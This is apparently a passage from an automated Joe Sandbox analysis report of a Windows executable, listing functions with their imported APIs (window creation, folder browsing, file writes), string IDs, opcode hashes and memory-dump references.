                                                                        • Opcode ID: b665be2987f77f662ff3f1567eed7b7eb98d8ed0a6deb91f434bba4fd19d7b4a
                                                                        • Instruction ID: 26d0d35871443cf73a281a40cb18e3271032821f4299fa5ffe9ef0f91627ffe6
                                                                        • Opcode Fuzzy Hash: b665be2987f77f662ff3f1567eed7b7eb98d8ed0a6deb91f434bba4fd19d7b4a
                                                                        • Instruction Fuzzy Hash: 9B31BF32924F1882D23085648D45BB76AA4E751760FD90F37DD9EB72E0D23F8D458D8E
                                                                        Function 00409FB0 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00409F70,00401180,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074,004180F0,00000004,00000000), ref: 0040A0EC
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00401180,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074,004180F0,00000004,00000000,00417064), ref: 0040A100
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        • Opcode ID: b7e867c821acaf844bbdab562fa5546bc418851262dc6eefeb18a67462b4137d
                                                                        • Instruction ID: ed707b84e897ebd9365ef63bb97156212438ba645da498dcb76798098b5433cd
                                                                        • Opcode Fuzzy Hash: b7e867c821acaf844bbdab562fa5546bc418851262dc6eefeb18a67462b4137d
                                                                        • Instruction Fuzzy Hash: 76E0C2B2508380FFC3108F20E94C687BBF4BB55741F00C93EA80A927A0CB748852EB1E
                                                                        Function 0040B9C7 Relevance: 2.9, APIs: 1, Instructions: 1619COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • memcpy.MSVCRT(?,?,00000040), ref: 0040B9D9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy
                                                                        • String ID:
                                                                        • API String ID: 3510742995-0
                                                                        • Opcode ID: acd0e2443a16ad88af06146353a72dec412846ba3d60e1a872444779584cfac7
                                                                        • Instruction ID: 7648e4874b510db5dc64b48861a8ad0d1bcfa4dcae448a9e57b277cf71a217b0
                                                                        • Opcode Fuzzy Hash: acd0e2443a16ad88af06146353a72dec412846ba3d60e1a872444779584cfac7
                                                                        • Instruction Fuzzy Hash: 43D23BB2B183008FC748CF29C89165AF7E2BFD8214F4A896DE545DB351DB35E846CB86
                                                                        Function 0040FA68 Relevance: 2.1, Strings: 1, Instructions: 842COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: hAA
                                                                        • API String ID: 0-1362906312
                                                                        • Opcode ID: 7fc8c6075135f61b4e465a5350afc3a94afa5303be66dee6bc8774c12ebf2cec
                                                                        • Instruction ID: 061b60707f08a323de6ca22a374bc66059e0427017f59017a69891467563d259
                                                                        • Opcode Fuzzy Hash: 7fc8c6075135f61b4e465a5350afc3a94afa5303be66dee6bc8774c12ebf2cec
                                                                        • Instruction Fuzzy Hash: 0762AD71A047129FC718CF18C59066AB7E1FFC8304F144A3EE8969BB81D778E959CB85
                                                                        Function 00411C20 Relevance: 1.6, Strings: 1, Instructions: 372COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: hAA
                                                                        • API String ID: 0-1362906312
                                                                        • Opcode ID: 71dca1fec58b1161358ab28b524daf179a02b381705128614a2cde410d01d185
                                                                        • Instruction ID: f848a90908651b5095397da3da739fda65f55eeb17523120767d540d1063a6f3
                                                                        • Opcode Fuzzy Hash: 71dca1fec58b1161358ab28b524daf179a02b381705128614a2cde410d01d185
                                                                        • Instruction Fuzzy Hash: F0D1E7716083828FC704CF28C48066ABBE2FFD9304F144A6EE9D58B752D379D98ACB55
                                                                        Function 00409FD0 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32(004011DA,004011BB,00000000,pF|,00000000,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074), ref: 00409FD6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        • Opcode ID: 3170e1e652b57c97785d64ceb6e545c80be0e67c980fbb0402b9cecf21492773
                                                                        • Instruction ID: ac8206da82d6392f4af85a502d91db7afc58579d845f6d3a682825b86ab87252
                                                                        • Opcode Fuzzy Hash: 3170e1e652b57c97785d64ceb6e545c80be0e67c980fbb0402b9cecf21492773
                                                                        • Instruction Fuzzy Hash: 68B0017A404180EFDB015F20ED4C7C63FB2B746745FD08AB8980181770CB790496DA0C
                                                                        Function 0040CF18 Relevance: .7, Instructions: 674COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7a400b198c8088953b694fc09eb18952a69227507a418fb01e42f7223b2c6d58
                                                                        • Instruction ID: 434e224409ee4b41571aafdaecae1a236b293988db59150c8aad3205160540e2
                                                                        • Opcode Fuzzy Hash: 7a400b198c8088953b694fc09eb18952a69227507a418fb01e42f7223b2c6d58
                                                                        • Instruction Fuzzy Hash: 3E12C5B3B546144BD70CCE1DCCA23A9B2D3AFD4218B0E853DB48AD3341FA7DD9198685
                                                                        Function 00410CA0 Relevance: .2, Instructions: 213COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2afca31d5e402dc53a6e3c1547e4f0f7fd84e8efed120adad160e64feba3fa86
                                                                        • Instruction ID: ce7637385bf2580d4bd45f7eed7cd981386548e1214f237c7f2b1e334cab5801
                                                                        • Opcode Fuzzy Hash: 2afca31d5e402dc53a6e3c1547e4f0f7fd84e8efed120adad160e64feba3fa86
                                                                        • Instruction Fuzzy Hash: B381B472620852CBE718CF1DEC907B63353E7C9340F99C639DA028779AE538B562C795
                                                                        Function 00410C80 Relevance: .2, Instructions: 193COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ebf3ce41f3a936af8fc8571fd5a5b65ced049cf5f7b88b68e7c4ff41129e470b
                                                                        • Instruction ID: eb62069f37237363b8ce6edce14327945305ce31afdb1d79ed38a397900698d6
                                                                        • Opcode Fuzzy Hash: ebf3ce41f3a936af8fc8571fd5a5b65ced049cf5f7b88b68e7c4ff41129e470b
                                                                        • Instruction Fuzzy Hash: 0A71F3F16205824BD714CF29FCD067673A2EBD9384F4AC639DB0287396C238B971C695
                                                                        Function 00410FB0 Relevance: .1, Instructions: 143COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2ab1992bfbf39856a5a7dba111a3cc4862fa1f22f04eab95b8f25578d2bf0e3f
                                                                        • Instruction ID: af0191558bb113c69bf01aa77dc2a624928e07331dce5fde3109ee2fd9e39919
                                                                        • Opcode Fuzzy Hash: 2ab1992bfbf39856a5a7dba111a3cc4862fa1f22f04eab95b8f25578d2bf0e3f
                                                                        • Instruction Fuzzy Hash: 5941EA32A4474547E728CF28C8553EFB390AB88304F45493ECB9697B60CB6EE9C68685
                                                                        Function 00411033 Relevance: .1, Instructions: 100COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6219c0534570dcc087454eb9247404a7b3db1bae580b6f203b5ef7fccfb18fab
                                                                        • Instruction ID: 72b98655ba701b9d964f93d3241bb8f545428b910a5ae8810ed1e036a2f8a9ba
                                                                        • Opcode Fuzzy Hash: 6219c0534570dcc087454eb9247404a7b3db1bae580b6f203b5ef7fccfb18fab
                                                                        • Instruction Fuzzy Hash: AD31DC32E447854BE728CF28C8953EB7390BB88304F49093FCB4697BA1C66AE9C5C645
                                                                        Function 00411079 Relevance: .1, Instructions: 82COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8f177ef76dc2d83bc780de5ca5247833b6fb957e59de742fcb7e95280a36d76d
                                                                        • Instruction ID: 87db66efce333c178885a799e057bc316407fa68a453293863d00c93a718f179
                                                                        • Opcode Fuzzy Hash: 8f177ef76dc2d83bc780de5ca5247833b6fb957e59de742fcb7e95280a36d76d
                                                                        • Instruction Fuzzy Hash: D121BB32A447450BE728CB28D8953FBB390AB88304F49493FCB5687BA1C66AD9C5C644
                                                                        Function 00408F69 Relevance: 65.0, APIs: 32, Strings: 5, Instructions: 270windowregistrymemoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00408E58: wcslen.MSVCRT ref: 00408E64
                                                                          • Part of subcall function 00408E58: HeapAlloc.KERNEL32(00000000,00000000,?,00408F81,?), ref: 00408E7A
                                                                          • Part of subcall function 00408E58: wcscpy.MSVCRT ref: 00408E8B
                                                                        • GetStockObject.GDI32(00000011), ref: 00408FB2
                                                                        • LoadIconW.USER32 ref: 00408FE9
                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00408FF9
                                                                        • RegisterClassExW.USER32 ref: 00409021
                                                                        • IsWindowEnabled.USER32(00000000), ref: 00409048
                                                                        • EnableWindow.USER32(00000000), ref: 00409059
                                                                        • GetSystemMetrics.USER32(00000001), ref: 00409091
                                                                        • GetSystemMetrics.USER32(00000000), ref: 0040909E
                                                                        • CreateWindowExW.USER32(00000000,00000000,10C80000,-00000096,?,?,?,?,?), ref: 004090BF
                                                                        • SetWindowLongW.USER32(00000000,000000EB,?), ref: 004090D3
                                                                        • CreateWindowExW.USER32(00000000,STATIC,?,5000000B,0000000A,0000000A,00000118,00000016,00000000,00000000,00000000), ref: 00409101
                                                                        • SendMessageW.USER32(00000000,00000030,00000001), ref: 00409119
                                                                        • CreateWindowExW.USER32(00000200,EDIT,00000000,00000000,0000000A,00000020,00000113,00000015,00000000,0000000A,00000000), ref: 00409157
                                                                        • SendMessageW.USER32(00000000,00000030,00000001), ref: 00409169
                                                                        • SetFocus.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409171
                                                                        • SendMessageW.USER32(0000000C,00000000,00000000), ref: 00409186
                                                                        • wcslen.MSVCRT ref: 00409189
                                                                        • wcslen.MSVCRT ref: 00409191
                                                                        • SendMessageW.USER32(000000B1,00000000,00000000), ref: 004091A3
                                                                        • CreateWindowExW.USER32(00000000,BUTTON,00413080,50010001,0000006E,00000043,00000050,00000019,00000000,000003E8,00000000), ref: 004091CD
                                                                        • SendMessageW.USER32(00000000,00000030,00000001), ref: 004091DF
                                                                        • CreateAcceleratorTableW.USER32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409216
                                                                        • SetForegroundWindow.USER32(00000000), ref: 0040921F
                                                                        • BringWindowToTop.USER32(00000000), ref: 00409226
                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00409239
                                                                        • TranslateAcceleratorW.USER32(00000000,00000000,?), ref: 0040924A
                                                                        • TranslateMessage.USER32(?), ref: 00409259
                                                                        • DispatchMessageW.USER32(?), ref: 00409264
                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 00409278
                                                                        • wcslen.MSVCRT ref: 00409289
                                                                        • wcscpy.MSVCRT ref: 004092A1
                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004092B4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Message$CreateSend$wcslen$Accelerator$HeapLoadMetricsSystemTableTranslatewcscpy$AllocBringClassCursorDestroyDispatchEnableEnabledFocusForegroundFreeIconLongObjectRegisterStock
                                                                        • String ID: 0$BUTTON$D0A$EDIT$STATIC
                                                                        • API String ID: 54849019-2968808370
                                                                        • Opcode ID: 64b7048e9784f6b3a965978878b2fb0e8fb718a1bb0b3c0aee67433a202d6ab7
                                                                        • Instruction ID: ac9e317f2143d035474ccc6d8eb2369134aae38ec411cec841dcb6eceac04435
                                                                        • Opcode Fuzzy Hash: 64b7048e9784f6b3a965978878b2fb0e8fb718a1bb0b3c0aee67433a202d6ab7
                                                                        • Instruction Fuzzy Hash: FC919071548300BFE7219F65DD49F9B7BE9EB48B50F00483EFA84A61E1CBB988408B5D
                                                                        Function 00401511 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 335fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WriteFile.KERNEL32(?,00000000,?,?,00000000,?), ref: 00401648
                                                                          • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                                                                          • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                                                                          • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                                                                          • Part of subcall function 004057F0: wcsncmp.MSVCRT ref: 00405853
                                                                          • Part of subcall function 004057F0: memmove.MSVCRT(00000000,00000000,?,00000000,00000000,?,?,-0000012C,?,?,00402252,00000000,00000002,00000000,00000000,00417024), ref: 004058E1
                                                                          • Part of subcall function 004057F0: wcsncpy.MSVCRT ref: 004058F9
                                                                          • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                                                                          • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(007C0000,00000000,?), ref: 0040E599
                                                                          • Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(007C0000,00000000,?,?), ref: 0040E5BC
                                                                          • Part of subcall function 0040AD45: wcsncpy.MSVCRT ref: 0040AD63
                                                                          • Part of subcall function 0040AD45: wcslen.MSVCRT ref: 0040AD75
                                                                          • Part of subcall function 0040AD45: CreateDirectoryW.KERNELBASE(?,00000000), ref: 0040ADB5
                                                                          • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateErrorHeapLastValuewcslenwcsncpy$CreateDirectoryFileWritememmovewcsncmp
                                                                        • String ID: $pA$&pA$.pA$2pA$2pA$2pA$6pA$6pA$6pA$\pA$\pA$\pA$\pA$\pA
                                                                        • API String ID: 1295435411-2952853158
                                                                        • Opcode ID: af3dae6db891e923df4a4e706107fb4aaecf548916866d68cba43d12f02d6bed
                                                                        • Instruction ID: 61c24dd49085b80bd1b70adcfbfbd818be60928fccba90bb55e88b0b877bbf77
                                                                        • Opcode Fuzzy Hash: af3dae6db891e923df4a4e706107fb4aaecf548916866d68cba43d12f02d6bed
                                                                        • Instruction Fuzzy Hash: AEB11FB1104304BED600BB62DD8297F77A9EB88708F50CD3FB144A61E2EA3DDD55962E
                                                                        Function 00409355 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 116libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CoInitialize.OLE32(00000000), ref: 00409373
                                                                          • Part of subcall function 0040EA90: TlsGetValue.KERNEL32(0000000D,\\?\,?,004096ED,00000104,?,?,?,00401BD6,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 0040EA9A
                                                                        • memset.MSVCRT ref: 00409381
                                                                        • LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040938E
                                                                        • GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 004093B0
                                                                        • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 004093BC
                                                                        • wcsncpy.MSVCRT ref: 004093DD
                                                                        • wcslen.MSVCRT ref: 004093F1
                                                                        • CoTaskMemFree.OLE32(?), ref: 0040947A
                                                                        • wcslen.MSVCRT ref: 00409481
                                                                        • FreeLibrary.KERNEL32(00000000,00000000), ref: 004094A0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: AddressFreeLibraryProcwcslen$InitializeLoadTaskValuememsetwcsncpy
                                                                        • String ID: $0A$P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
                                                                        • API String ID: 4193992262-92458654
                                                                        • Opcode ID: cbde42508be9eaa54418296cf2fcec228ecaff496ce27a8586192ba66c484795
                                                                        • Instruction ID: dd14e0d5c7aaf6d086be5bb491997024bece532a8fadf3e5f1c49f9ab44bf52d
                                                                        • Opcode Fuzzy Hash: cbde42508be9eaa54418296cf2fcec228ecaff496ce27a8586192ba66c484795
                                                                        • Instruction Fuzzy Hash: 43414471508304AAC720EF759C49A9FBBE8EF88714F004C3FF945E3292D77899458B5A
                                                                        Function 00406310 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 275COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • wcsncpy.MSVCRT ref: 00406405
                                                                          • Part of subcall function 0040E880: TlsGetValue.KERNEL32(0000000D,?,?,00405EC5,00001000,00001000,?,?,00001000,00402F92,00000000,00000008,00000001,00000000,00000000,00000000), ref: 0040E88A
                                                                        • _wcsdup.MSVCRT ref: 0040644E
                                                                        • _wcsdup.MSVCRT ref: 00406469
                                                                        • _wcsdup.MSVCRT ref: 0040648C
                                                                        • wcsncpy.MSVCRT ref: 00406578
                                                                        • free.MSVCRT ref: 004065DC
                                                                        • free.MSVCRT ref: 004065EF
                                                                        • free.MSVCRT ref: 00406602
                                                                        • wcsncpy.MSVCRT ref: 0040662E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: _wcsdupfreewcsncpy$Value
                                                                        • String ID: $0A$$0A$$0A
                                                                        • API String ID: 1554701960-360074770
                                                                        • Opcode ID: f59d57380f8462386650d730b526675ad7e9bff01cb308e942a75ae948ec079d
                                                                        • Instruction ID: 8dd6decbfdfb2e9f9ed0212bb19f765ed94392260ea2aa670051c2f9137328dc
                                                                        • Opcode Fuzzy Hash: f59d57380f8462386650d730b526675ad7e9bff01cb308e942a75ae948ec079d
                                                                        • Instruction Fuzzy Hash: 27A1BD715043019BCB209F18C881A2BB7F1EF94348F49493EFC8667391E77AD965CB9A
                                                                        Function 0040AEBA Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 91libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0040E900: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E90C
                                                                          • Part of subcall function 0040E900: HeapReAlloc.KERNEL32(007C0000,00000000,?,?), ref: 0040E967
                                                                        • LoadLibraryW.KERNEL32(Shell32.DLL,00000104,?,?,?,?,00000009,0040373D,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0040AEE3
